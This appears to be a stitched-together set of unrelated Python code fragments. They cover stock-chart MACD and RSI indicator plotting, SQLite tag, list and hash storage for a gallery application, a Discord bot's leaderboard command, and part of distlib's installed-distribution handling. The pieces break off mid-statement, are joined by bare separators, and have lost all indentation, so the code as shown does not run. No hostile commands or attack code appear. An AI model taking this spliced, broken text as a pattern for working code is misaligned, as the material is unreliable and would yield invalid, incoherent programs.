self.removeX.set_position(((self.xlims[1] - self.xlims[0])*0.97 + self.xlims[0], min(0, minMacd-buf/2)))
except Exception as e:
print("Could not draw MACD:", e)
def drawArtists(self, redraw):
if redraw:
idx0 = max(0, self.xlims[0])
idx1 = min(self.xlims[1]+1, len(self.macdBars)-1)
for i in range(idx0, idx1):
self.ax.draw_artist(self.macdBars[i])
else:
self.ax.draw_artist(self.macdBars[(min(self.xlims[1]+1, len(self.macdBars)-1))])
self.ax.draw_artist(self.derivLine)
self.ax.draw_artist(self.removeX)
class RSI(Indicator):
def __init__(self, ax, xlims):
super(RSI, self).__init__(ax, xlims)
self.avgGain = 0
self.avgLoss = 0
self.rsi = []
self.lastPrice = 0
self.xlims = xlims
self.rsiPlot = None
self.hiThresh = None
self.loThresh = None
self.rsiText = None
self.over_fill = []
self.ax.set_ylabel("RSI (14)", fontsize=8)
self.ax.set_ylim(0, 100)
def initPlot(self, i):
self.rsiPlot, = self.ax.plot(range(i+1), self.rsi, "-", c="yellow", linewidth=0.9)
self.hiThresh, = self.ax.plot(self.xlims, [70,70], "--", c="white", linewidth=0.5)
self.loThresh, = self.ax.plot(self.xlims, [30,30], "--", c="white", linewidth=0.5)
self.rsiText = self.ax.text(0, 0, "", fontsize=9, color="#cecece")
# fill areas that are overbought or oversold
yhi = [70]*len(self.rsi)
ylo = [30]*len(self.rsi)
overbought = [y1 > y2 for y1,y2 in zip(self.rsi, yhi)]
oversold = [y1 < y2 for y1,y2 in zip(self.rsi, ylo)]
self.over_fill.append(self.ax.fill_between(range(i+1), self.rsi, yhi, where=overbought, facecolor="red", interpolate=True))
self.over_fill.append(self.ax.fill_between(range(i+1), self.rsi, ylo, where=oversold, facecolor="blue", interpolate=True))
def loadHistory(self, ohlc, data, vol, histCnt):
# 100
# RSI = 100 - --------------------
# (1 + avgGain/avgLoss)
#
# calculate rsi for history data that occurs before the displayed data
n = min([len(d) for d in data]) #(data[0])
for i in range(n - histCnt):
idx = n-i-1
temp = [float(x[idx][1]) for x in data if x[idx][-1]] # data has been modified so last element is bool classifying the validity
tempOpen = sum(temp) / len(temp)
temp = [float(x[idx][4]) for x in data if x[idx][-1]]
tempClose = sum(temp) / len(temp)
diff = tempClose - tempOpen
# find average of first 14 periods
if i < 14:
if diff < 0:
self.avgLoss -= diff
else:
self.avgGain += diff
if i == 13:
self.avgGain /= 14
self.avgLoss /= 14
# remaining periods = (prev_avg * 13 + current_diff) / 14
else:
if diff < 0:
self.avgLoss = (self.avgLoss * 13 - diff)
self.avgGain *= 13
else:
self.avgGain = (self.avgGain * 13 + diff)
self.avgLoss *= 13
self.avgGain /= 14
self.avgLoss /= 14
self.rsi.append(100 - (100 / (1 + (self.avgGain / self.avgLoss))))
# calculate rsi for every interval of displayed data
for i in range(len(ohlc)-1):
diff = ohlc[i][4] - ohlc[i][1]
if diff < 0:
self.avgLoss = (self.avgLoss * 13 - diff)
self.avgGain *= 13
else:
self.avgGain = (self.avgGain * 13 + diff)
self.avgLoss *= 13
self.avgGain /= 14
self.avgLoss /= 14
self.rsi.append(100 - (100 / (1 + (self.avgGain / self.avgLoss))))
def resetRSItime(self):
gains = self.avgGain
losses = self.avgLoss
startRSI = self.rsi[-1]
expectedTime = 0
avgDiff = 0
for i in range(1, len(self.rsi)):
avgDiff += abs(self.rsi[i] - self.rsi[i-1])
avgDiff /= (len(self.rsi) - 1)
candles = int(abs(startRSI - 50) / avgDiff + 0.5)
lastDiff = startRSI-self.rsi[-2]
g_l = 100/((100/(1+gains/losses))-lastDiff)-1
if lastDiff < 0:
gains = gains*13/14
losses = gains/g_l
elif lastDiff > 0:
losses = losses*13/14
gains = losses*g_l
gainOrLoss = 0
if startRSI > 50: avgDiff *= -1
for i in range(candles):
g_l = 100/((100/(1+gains/losses))-avgDiff)-1
if startRSI > 50:
gains = gains*13/14
tempL = gains/g_l
gainOrLoss -= tempL*14 - 13*losses
#print(g_l, gains, tempL, tempL*14 - 13*losses)
losses = tempL
elif startRSI < 50:
losses = losses*13/14
tempG = losses*g_l
gainOrLoss += tempG*14 - 13*gains
gains = tempG
return candles, gainOrLoss
tempRSI = startRSI
while (tempRSI > 50 and startRSI > 50) or (tempRSI < 50 and startRSI < 50):
if startRSI < 50:
| |
return None
# time to map the tags to the namespace now
for tag_id in tags_id_list:
# First check if tags mappings exists
try:
t_map_id = look_exist_tag_map(tag_id)
if t_map_id:
tags_mappings_id_list.append(t_map_id)
else:
raise TypeError
except TypeError:
c = cls.execute('INSERT INTO tags_mappings(namespace_id, tag_id) VALUES(?, ?)',
(namespace_id, tag_id,))
# add the tags_mappings_id to our list
tags_mappings_id_list.append(c.lastrowid)
# Lastly we map the series_id to the tags_mappings
executing = []
for tags_map in tags_mappings_id_list:
executing.append((series_id, tags_map,))
# cls.execute(cls, 'INSERT INTO series_tags_map(series_id, tags_mappings_id)
# VALUES(?, ?)', (series_id, tags_map,))
cls.executemany('INSERT OR IGNORE INTO series_tags_map(series_id, tags_mappings_id) VALUES(?, ?)',
executing)
@staticmethod
def modify_tags(series_id, dict_of_tags):
"""Modifies the given tags"""
# We first delete all mappings
TagDB.del_gallery_mapping(series_id)
# Now we add the new tags to DB
weak_gallery = Gallery()
weak_gallery.id = series_id
weak_gallery.tags = dict_of_tags
TagDB.add_tags(weak_gallery)
@staticmethod
def get_tag_gallery(tag):
"""Returns all galleries with the given tag"""
pass
@classmethod
def get_ns_tags(cls):
"""Returns a dict of all tags with namespace as key and list of tags as value"""
cursor = cls.execute('SELECT namespace_id, tag_id FROM tags_mappings')
ns_tags = {}
ns_id_history = {} # to avoid unesseccary DB fetching
for t in cursor.fetchall():
try:
# get namespace
if not t['namespace_id'] in ns_id_history:
c = cls.execute('SELECT namespace FROM namespaces WHERE namespace_id=?', (t['namespace_id'],))
ns = c.fetchone()['namespace']
ns_id_history[t['namespace_id']] = ns
else:
ns = ns_id_history[t['namespace_id']]
# get tag
c = cls.execute('SELECT tag FROM tags WHERE tag_id=?', (t['tag_id'],))
tag = c.fetchone()['tag']
# put in dict
if ns in ns_tags:
ns_tags[ns].append(tag)
else:
ns_tags[ns] = [tag]
except:
continue
return ns_tags
@staticmethod
def get_tags_from_namespace(namespace):
"""Returns a dict with namespace as key and list of tags as value"""
pass
@staticmethod
def get_ns_tags_to_gallery(ns_tags):
"""
Returns all galleries linked to the namespace tags.
Receives a dict like this: {"namespace":["tag1","tag2"]}
"""
pass
@classmethod
def get_all_tags(cls):
"""
Returns all tags in database in a list
"""
cursor = cls.execute('SELECT tag FROM tags')
tags = [t['tag'] for t in cursor.fetchall()]
return tags
@classmethod
def get_all_ns(cls):
"""
Returns all namespaces in database in a list
"""
cursor = cls.execute('SELECT namespace FROM namespaces')
ns = [n['namespace'] for n in cursor.fetchall()]
return ns
class ListDB(DBBase):
"""
"""
@classmethod
def init_lists(cls):
"""Creates and returns lists fetched from DB"""
lists = []
c = cls.execute('SELECT * FROM list')
list_rows = c.fetchall()
for l_row in list_rows:
l = GalleryList(l_row['list_name'], filter=l_row['list_filter'], id=l_row['list_id'])
if l_row['type'] == GalleryList.COLLECTION:
l.type = GalleryList.COLLECTION
elif l_row['type'] == GalleryList.REGULAR:
l.type = GalleryList.REGULAR
profile = l_row['profile']
if profile:
l.profile = bytes.decode(profile)
l.enforce = bool(l_row['enforce'])
l.regex = bool(l_row['regex'])
l.case = bool(l_row['l_case'])
l.strict = bool(l_row['strict'])
lists.append(l)
app_constants.GALLERY_LISTS.add(l)
return lists
@classmethod
def query_gallery(cls, gallery):
"""Maps gallery to the correct lists"""
c = cls.execute('SELECT list_id FROM series_list_map WHERE series_id=?', (gallery.id,))
list_rows = [x['list_id'] for x in c.fetchall()]
for l in app_constants.GALLERY_LISTS:
if l._id in list_rows:
l.add_gallery(gallery, False, _check_filter=False)
@classmethod
def modify_list(cls, gallery_list: GalleryList):
assert isinstance(gallery_list, GalleryList)
if gallery_list.id:
cls.execute("""UPDATE list SET list_name=?, list_filter=?, profile=?,
type=?, enforce=?, regex=?, l_case=?, strict=? WHERE list_id=?""",
(gallery_list.name, gallery_list.filter, str.encode(gallery_list.profile),
gallery_list.type, int(gallery_list.enforce), int(gallery_list.regex), int(gallery_list.case),
int(gallery_list.strict), gallery_list.id))
@classmethod
def add_list(cls, gallery_list: GalleryList):
"""Adds a list of GalleryList class to DB"""
assert isinstance(gallery_list, GalleryList)
if gallery_list.id:
ListDB.modify_list(gallery_list)
else:
c = cls.execute("""INSERT INTO list(list_name, list_filter, profile, type,
enforce, regex, l_case, strict) VALUES(?, ?, ?, ?, ?, ?, ?, ?)""",
(
gallery_list.name, gallery_list.filter, str.encode(gallery_list.profile),
gallery_list.type,
int(gallery_list.enforce), int(gallery_list.regex), int(gallery_list.case),
int(gallery_list.strict)))
gallery_list._id = c.lastrowid
ListDB.add_gallery_to_list(gallery_list.galleries(), gallery_list)
@classmethod
def _g_id_or_list(cls, gallery_or_id_or_list: Union[Gallery, int, List[Gallery], List[int]]) -> List[int]:
"""Returns gallery ids"""
if isinstance(gallery_or_id_or_list, (Gallery, int)):
gallery_or_id_or_list = [gallery_or_id_or_list]
return [g.id if isinstance(g, Gallery) else g for g in gallery_or_id_or_list]
@classmethod
def add_gallery_to_list(cls, gallery_or_id_or_list: Union[Gallery, int, List[Gallery], List[int]],
gallery_list: GalleryList) -> None:
"""Maps provided gallery or list of galleries or gallery id to list"""
assert isinstance(gallery_list, GalleryList)
g_ids = cls._g_id_or_list(gallery_or_id_or_list)
values = [(gallery_list.id, x) for x in g_ids]
cls.executemany('INSERT OR IGNORE INTO series_list_map(list_id, series_id) VALUES(?, ?)', values)
@classmethod
def remove_list(cls, gallery_list):
"""Deletes list from DB"""
assert isinstance(gallery_list, GalleryList)
if gallery_list.id:
cls.execute('DELETE FROM list WHERE list_id=?', (gallery_list.id,))
try:
app_constants.GALLERY_LISTS.remove(gallery_list)
except KeyError:
pass
@classmethod
def remove_gallery_from_list(cls, gallery_or_id_or_list: Union[Gallery, int, List[int]], gallery_list: GalleryList):
"""Removes provided gallery or list of galleries or gallery id from list"""
assert isinstance(gallery_list, GalleryList)
if gallery_list.id:
g_ids = ListDB._g_id_or_list(gallery_or_id_or_list)
values = [(gallery_list.id, x) for x in g_ids]
cls.executemany('DELETE FROM series_list_map WHERE list_id=? AND series_id=?', values)
class HashDB(DBBase):
"""
Contains the following methods:
find_gallery -> returns galleries which matches the given list of hashes
get_gallery_hashes -> returns all hashes with the given gallery id in a list
get_gallery_hash -> returns hash of chapter specified. If page is specified, returns hash of chapter page
gen_gallery_hashes <- generates hashes for gallery's chapters and inserts them to db
rebuild_gallery_hashes <- inserts hashes into DB only if it doesnt already exist
"""
@classmethod
def find_gallery(cls, hashes: List):
assert isinstance(hashes, list)
gallery_ids = {}
hash_status = []
for hash in hashes:
r = cls.execute('SELECT series_id FROM hashes WHERE hash=?', (hash,))
try:
g_ids = r.fetchall()
for r in g_ids:
g_id = r['series_id']
if g_id not in gallery_ids:
gallery_ids[g_id] = 1
else:
gallery_ids[g_id] = gallery_ids[g_id] + 1
if g_ids:
hash_status.append(True)
else:
hash_status.append(False)
except KeyError:
hash_status.append(False)
except TypeError:
hash_status.append(False)
if all(hash_status):
# the one with most matching hashes
g_id = None
h_match_count = 0
for g in gallery_ids:
gallery_id = gallery_ids[g]
if gallery_id > h_match_count:
h_match_count = gallery_id
g_id = g
if g_id:
weak_gallery = Gallery()
weak_gallery.id = g_id
return weak_gallery
return None
@classmethod
def get_gallery_hashes(cls, gallery_id: int) -> List[bytes]:
"""Returns all hashes with the given gallery id in a list"""
cursor = cls.execute('SELECT hash FROM hashes WHERE series_id=?',
(gallery_id,))
hashes = []
try:
for row in cursor.fetchall():
hashes.append(row['hash'])
except IndexError:
return []
return hashes
@classmethod
def get_gallery_hash(cls, gallery_id: int, chapter: int, page: Optional[int] = None) -> Optional[List[bytes]]:
"""
returns hash of chapter. If page is specified, returns hash of chapter page
"""
assert isinstance(gallery_id, int)
assert isinstance(chapter, int)
if page:
assert isinstance(page, int)
chap_id = ChapterDB.get_chapter_id(gallery_id, chapter)
if not chap_id:
return None
if page:
exceuting = ["SELECT hash FROM hashes WHERE series_id=? AND chapter_id=? AND page=?",
(gallery_id, chap_id, page)]
else:
exceuting = ["SELECT hash FROM hashes WHERE series_id=? AND chapter_id=?",
(gallery_id, chap_id)]
hashes = []
c = cls.execute(*exceuting)
for h in c.fetchall():
try:
hashes.append(h['hash'])
except KeyError:
pass
return hashes
@classmethod
def gen_gallery_hash(cls, gallery: Gallery, chapter: int, page: Union[int, str, List, None] = None, color_img=False,
_name=None) -> Union[Dict[Union[int, str], Union[bytes, str, 'os.PathLike']], Iterable[bytes]]:
"""
Generate hash for a specific chapter.
Set page to only generate specific page
page: 'mid' or number or list of numbers
color_img: if true then a hash to colored img will be returned if possible
Returns dict with chapter number or 'mid' as key and hash as value
"""
assert isinstance(gallery, Gallery)
assert isinstance(chapter, int)
if page is not None:
assert isinstance(page, (int, str, list))
skip_gen = False
chap_id = None
hashes = {}
if gallery.id is not None:
chap_id = ChapterDB.get_chapter_id(gallery.id, chapter)
c = cls.execute('SELECT hash, page FROM hashes WHERE series_id=? AND chapter_id=?',
(gallery.id, chap_id,))
hashes = {}
for r in c.fetchall():
try:
if r['hash'] and r['page'] is not None:
hashes[r['page']] = r['hash']
except TypeError:
pass
if isinstance(page, (int, list)):
if isinstance(page, int):
_page = [page]
else:
_page = page
h = {}
t = False
for p in _page:
if p in hashes:
h[p] = hashes[p]
else:
t = True
if not t:
skip_gen = True
hashes = h
elif gallery.chapters[chapter].pages == len(hashes.keys()):
skip_gen = True
if page == "mid":
try:
hashes = {'mid': hashes[len(hashes) // 2]}
except KeyError:
skip_gen = False
if not skip_gen or color_img:
def look_exists(page):
"""check if hash already exists in database
returns hash, else returns None"""
c = cls.execute('SELECT hash FROM hashes WHERE page=? AND chapter_id=?',
(page, chap_id,))
try: # exists
return c.fetchone()['hash']
except TypeError: # doesnt exist
return None
except IndexError:
return None
if gallery.dead_link:
log_e("Could not generate hash of dead gallery: {}".format(gallery.title.encode(errors='ignore')))
return {}
try:
chap = gallery.chapters[chapter]
except KeyError:
utils.make_chapters(gallery)
try:
chap = gallery.chapters[chapter]
except KeyError:
return {}
executing = []
try:
if gallery.is_archive:
raise NotADirectoryError
imgs = | |
<filename>modules/toplist.py
from audiovisuaali import send
from config import OWNER_ID as owners
from mysqlfiles import users_get_top_xp
from discord.utils import get as duget
from config import COMMAND_START as starter
from mysqlfiles import points_stats_get_win_high
from mysqlfiles import points_stats_get_lost_high
from mysqlfiles import users_get_top_points_by_wallet
from mysqlfiles import users_get_top_points_by_bank
from mysqlfiles import users_get_top_points_with_bank
from mysqlfiles import points_stats_get_high
#TODO ADD .fotmat for each row
# Formats username if nick is present or user left the server
def users_name(user_object, row):
if user_object is None:
name = "User left the server ID:{}".format(row[0])
else:
if user_object.nick is None:
name =user_object.name
else:
name = user_object.nick
return name
# Number checker
def check_is_number(number):
try:
int(number)
return True
except:
return False
# Get points
async def top(message, client, arguments):
try:
# No arguments give normal list
if len(arguments) == 0:
# header
rows = "**Ranking top __memes__ order by condescending (wallet + bank)**```py\nRank | Name \n\n"
# Getting results
result = users_get_top_points_with_bank(client.user.id, 5)
number = 1
# Creating scoreboard
for row in result:
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# stat
rows = rows + "[{}{}] {}\n{}->{} memes ({}+{})\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[3]),str(row[1]),str(row[2]))
number += 1
# Creating scoreboard and sending it
rows += "```\n**Ranking top __xp__ order by condescending**\n```py\nRank | Name\n\n"
# Getting top users by points
result, number = users_get_top_xp(client.user.id, 5), 1
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{} xp\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```\n**For more information you can do:\n1. {}top points/memes\n2. {}top memes wallet/bank\n3. {}top xp\n4. {}top win/wins\n5. {}top lose/lost/loses\n6. {}top roulette wins/loses\n7. {}top slots wins/loses**".format(rows, starter, starter, starter, starter, starter, starter, starter)
elif arguments[0] in ["memes", "points"]:
if len(arguments) in [2,3] and not check_is_number(arguments[1]):
if len(arguments) == 3:
if message.author.id not in owners:
return
try:
rows_amount = int(arguments[2])
except:
rows_amount = 10
if rows_amount > 30:
rows_amount = 30
else:
rows_amount = 10
# Wallet
if arguments[1] == "wallet":
rows = "**Ranking top __memes__ order by condescending (wallet)**\n```py\nRank | Name \n\n"
result = users_get_top_points_by_wallet(client.user.id, rows_amount)
# Bank
elif arguments[1] == "bank":
rows = "**Ranking top __memes__ order by condescending (bank)**\n```py\nRank | Name \n\n"
result = users_get_top_points_by_bank(client.user.id, rows_amount)
# Return bad input
else:
return
number = 1
# Creating scoreboard
for row in result:
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# stat
rows = rows + "[{}{}] {}\n{}->{} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
scoreboard = rows + "```"
else:
if len(arguments) == 2:
try:
rows_amount = int(arguments[1])
except:
rows_amount = 10
else:
rows_amount = 10
# header
rows = "**Ranking top __memes__ order by condescending (wallet + bank)**\n```py\nRank | Name \n\n"
# Getting results
result = users_get_top_points_with_bank(client.user.id, rows_amount)
number = 1
# Creating scoreboard
for row in result:
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# stat
rows = rows + "[{}{}] {}\n{}->{} memes ({}+{})\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[3]),str(row[1]),str(row[2]))
number += 1
scoreboard = rows + "```"
elif arguments[0] == "xp":
if len(arguments) == 2:
try:
rows_amount = int(arguments[1])
except:
rows_amount = 10
else:
rows_amount = 10
# header
rows, number = "**Ranking top __xp__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points
result = users_get_top_xp(client.user.id, rows_amount)
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[0])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{} xp\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
elif arguments[0] in ["win", "wins"]:
limit = 10
# header
rows, number = "**Ranking top __wins__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points
result = points_stats_get_win_high(limit)
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
# [01] username \n mode<spacing>
print(len(result))
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(10-len(row[3])),row[6])
#rows = rows + "[{}{}] {}\n{}->{} xp\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*8, str(row[1]))
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
elif arguments[0] in ["lose", "lost", "loses"]:
limit = 10
# header
rows, number = "**Ranking top __loses__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points
result = points_stats_get_lost_high(limit)
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(10-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
elif arguments[0] == "slots":
if len(arguments) in [2,3] and not check_is_number(arguments[1]):
if arguments[1] in ["win", "wins"]:
rows = "**Ranking top __slots wins__ order by condescending**```py\nRank | Name \n\n"
mode = "plus"
elif arguments[1] in ["lose", "lost", "loses"]:
rows = "**Ranking top __slots loses__ order by condescending**```py\nRank | Name \n\n"
mode = "minus"
else:
return
# Limit
limit = 10
# header
number = 1
# Getting top users by points, 8 for slots
result = points_stats_get_high(8, mode, limit) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
# [01] username \n mode<spacing>
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(6-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
else:
# header
rows, number = "**Ranking top __slots wins__ order by condescending**```py\nRank | Name \n\n", 1
# Getting top users by points, 8 for slots
result = points_stats_get_high(8, "plus", 5) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(6-len(row[3])),row[6])
number += 1
number = 1
rows = rows + "```\n**Ranking top __slots loses__ order by condescending**\n```py\nRank | Name \n\n"
# Getting top users by points, 8 for slots
result = points_stats_get_high(8, "minus", 5) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(8-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```\n**For more information you can do:\n1. {}top slots wins\n2. {}top slots loses**".format(rows, starter, starter)
elif arguments[0] == "roulette":
if len(arguments) in [2,3] and not check_is_number(arguments[1]):
if arguments[1] in ["win", "wins"]:
rows = "**Ranking top __roulette wins__ order by condescending**```py\nRank | Name \n\n"
mode = "plus"
elif arguments[1] in ["lose", "lost", "loses"]:
rows = "**Ranking top __roulette loses__ order by condescending**```py\nRank | Name \n\n"
mode = "minus"
else:
return
# Limit
limit = 10
# header
number = 1
# Getting top users by points, 8 for slots
result = points_stats_get_high(5, mode, limit) #minus
# Creating scoreboard
for row in result:
# Gets the users name by id
user_object = duget(message.server.members, id=row[1])
# Name
name = users_name(user_object, row)
# For space fix TODO
# [01] username \n mode<spacing>
rows = rows + "[{}{}] {}\n{}->{}{} {} memes\n".format(" "*(len(str(len(result)))-len(str(number))), str(number), name, " "*4, row[3], " "*(6-len(row[3])),row[6])
number += 1
# Creating scoreboard and sending it
scoreboard = "\n{}```".format(rows)
else:
# header
rows, number = "**Ranking top __roulette wins__ order by condescending**```py\nRank | Name \n\n", 1
# Getting | |
"""
# Requirement may contain extras - parse to lose those
# from what's passed to the matcher
r = parse_requirement(req)
scheme = get_scheme(self.metadata.scheme)
try:
matcher = scheme.matcher(r.requirement)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
result = False
for p in self.provides:
p_name, p_ver = parse_name_and_version(p)
if p_name != name:
continue
try:
result = matcher.match(p_ver)
break
except UnsupportedVersionError:
pass
return result
def __repr__(self):
"""
Return a textual representation of this instance,
"""
if self.source_url:
suffix = ' [%s]' % self.source_url
else:
suffix = ''
return '<Distribution %s (%s)%s>' % (self.name, self.version, suffix)
def __eq__(self, other):
"""
See if this distribution is the same as another.
:param other: The distribution to compare with. To be equal to one
another. distributions must have the same type, name,
version and source_url.
:return: True if it is the same, else False.
"""
if type(other) is not type(self):
result = False
else:
result = (self.name == other.name and
self.version == other.version and
self.source_url == other.source_url)
return result
def __hash__(self):
"""
Compute hash in a way which matches the equality test.
"""
return hash(self.name) + hash(self.version) + hash(self.source_url)
class BaseInstalledDistribution(Distribution):
"""
This is the base class for installed distributions (whether PEP 376 or
legacy).
"""
hasher = None
def __init__(self, metadata, path, env=None):
"""
Initialise an instance.
:param metadata: An instance of :class:`Metadata` which describes the
distribution. This will normally have been initialised
from a metadata file in the ``path``.
:param path: The path of the ``.dist-info`` or ``.egg-info``
directory for the distribution.
:param env: This is normally the :class:`DistributionPath`
instance where this distribution was found.
"""
super(BaseInstalledDistribution, self).__init__(metadata)
self.path = path
self.dist_path = env
def get_hash(self, data, hasher=None):
"""
Get the hash of some data, using a particular hash algorithm, if
specified.
:param data: The data to be hashed.
:type data: bytes
:param hasher: The name of a hash implementation, supported by hashlib,
or ``None``. Examples of valid values are ``'sha1'``,
``'sha224'``, ``'sha384'``, '``sha256'``, ``'md5'`` and
``'sha512'``. If no hasher is specified, the ``hasher``
attribute of the :class:`InstalledDistribution` instance
is used. If the hasher is determined to be ``None``, MD5
is used as the hashing algorithm.
:returns: The hash of the data. If a hasher was explicitly specified,
the returned hash will be prefixed with the specified hasher
followed by '='.
:rtype: str
"""
if hasher is None:
hasher = self.hasher
if hasher is None:
hasher = hashlib.md5
prefix = ''
else:
hasher = getattr(hashlib, hasher)
prefix = '%s=' % self.hasher
digest = hasher(data).digest()
digest = base64.urlsafe_b64encode(digest).rstrip(b'=').decode('ascii')
return '%s%s' % (prefix, digest)
class InstalledDistribution(BaseInstalledDistribution):
"""
Created with the *path* of the ``.dist-info`` directory provided to the
constructor. It reads the metadata contained in ``pydist.json`` when it is
instantiated., or uses a passed in Metadata instance (useful for when
dry-run mode is being used).
"""
hasher = 'sha256'
def __init__(self, path, metadata=None, env=None):
self.modules = []
self.finder = finder = resources.finder_for_path(path)
if finder is None:
raise ValueError('finder unavailable for %s' % path)
if env and env._cache_enabled and path in env._cache.path:
metadata = env._cache.path[path].metadata
elif metadata is None:
r = finder.find(METADATA_FILENAME)
# Temporary - for Wheel 0.23 support
if r is None:
r = finder.find(WHEEL_METADATA_FILENAME)
# Temporary - for legacy support
if r is None:
r = finder.find(LEGACY_METADATA_FILENAME)
if r is None:
raise ValueError('no %s found in %s' % (METADATA_FILENAME,
path))
with contextlib.closing(r.as_stream()) as stream:
metadata = Metadata(fileobj=stream, scheme='legacy')
super(InstalledDistribution, self).__init__(metadata, path, env)
if env and env._cache_enabled:
env._cache.add(self)
r = finder.find('REQUESTED')
self.requested = r is not None
p = os.path.join(path, 'top_level.txt')
if os.path.exists(p):
with open(p, 'rb') as f:
data = f.read().decode('utf-8')
self.modules = data.splitlines()
def __repr__(self):
return '<InstalledDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def _get_records(self):
"""
Get the list of installed files for the distribution
:return: A list of tuples of path, hash and size. Note that hash and
size might be ``None`` for some entries. The path is exactly
as stored in the file (which is as in PEP 376).
"""
results = []
r = self.get_distinfo_resource('RECORD')
with contextlib.closing(r.as_stream()) as stream:
with CSVReader(stream=stream) as record_reader:
# Base location is parent dir of .dist-info dir
#base_location = os.path.dirname(self.path)
#base_location = os.path.abspath(base_location)
for row in record_reader:
missing = [None for i in range(len(row), 3)]
path, checksum, size = row + missing
#if not os.path.isabs(path):
# path = path.replace('/', os.sep)
# path = os.path.join(base_location, path)
results.append((path, checksum, size))
return results
@cached_property
def exports(self):
"""
Return the information exported by this distribution.
:return: A dictionary of exports, mapping an export category to a dict
of :class:`ExportEntry` instances describing the individual
export entries, and keyed by name.
"""
result = {}
r = self.get_distinfo_resource(EXPORTS_FILENAME)
if r:
result = self.read_exports()
return result
def read_exports(self):
"""
Read exports data from a file in .ini format.
:return: A dictionary of exports, mapping an export category to a list
of :class:`ExportEntry` instances describing the individual
export entries.
"""
result = {}
r = self.get_distinfo_resource(EXPORTS_FILENAME)
if r:
with contextlib.closing(r.as_stream()) as stream:
result = read_exports(stream)
return result
def write_exports(self, exports):
"""
Write a dictionary of exports to a file in .ini format.
:param exports: A dictionary of exports, mapping an export category to
a list of :class:`ExportEntry` instances describing the
individual export entries.
"""
rf = self.get_distinfo_file(EXPORTS_FILENAME)
with open(rf, 'w') as f:
write_exports(exports, f)
def get_resource_path(self, relative_path):
"""
NOTE: This API may change in the future.
Return the absolute path to a resource file with the given relative
path.
:param relative_path: The path, relative to .dist-info, of the resource
of interest.
:return: The absolute path where the resource is to be found.
"""
r = self.get_distinfo_resource('RESOURCES')
with contextlib.closing(r.as_stream()) as stream:
with CSVReader(stream=stream) as resources_reader:
for relative, destination in resources_reader:
if relative == relative_path:
return destination
raise KeyError('no resource file with relative path %r '
'is installed' % relative_path)
def list_installed_files(self):
"""
Iterates over the ``RECORD`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: iterator of (path, hash, size)
"""
for result in self._get_records():
yield result
def write_installed_files(self, paths, prefix, dry_run=False):
"""
Writes the ``RECORD`` file, using the ``paths`` iterable passed in. Any
existing ``RECORD`` file is silently overwritten.
prefix is used to determine when to write absolute paths.
"""
prefix = os.path.join(prefix, '')
base = os.path.dirname(self.path)
base_under_prefix = base.startswith(prefix)
base = os.path.join(base, '')
record_path = self.get_distinfo_file('RECORD')
logger.info('creating %s', record_path)
if dry_run:
return None
with CSVWriter(record_path) as writer:
for path in paths:
if os.path.isdir(path) or path.endswith(('.pyc', '.pyo')):
# do not put size and hash, as in PEP-376
hash_value = size = ''
else:
size = '%d' % os.path.getsize(path)
with open(path, 'rb') as fp:
hash_value = self.get_hash(fp.read())
if path.startswith(base) or (base_under_prefix and
path.startswith(prefix)):
path = os.path.relpath(path, base)
writer.writerow((path, hash_value, size))
# add the RECORD file itself
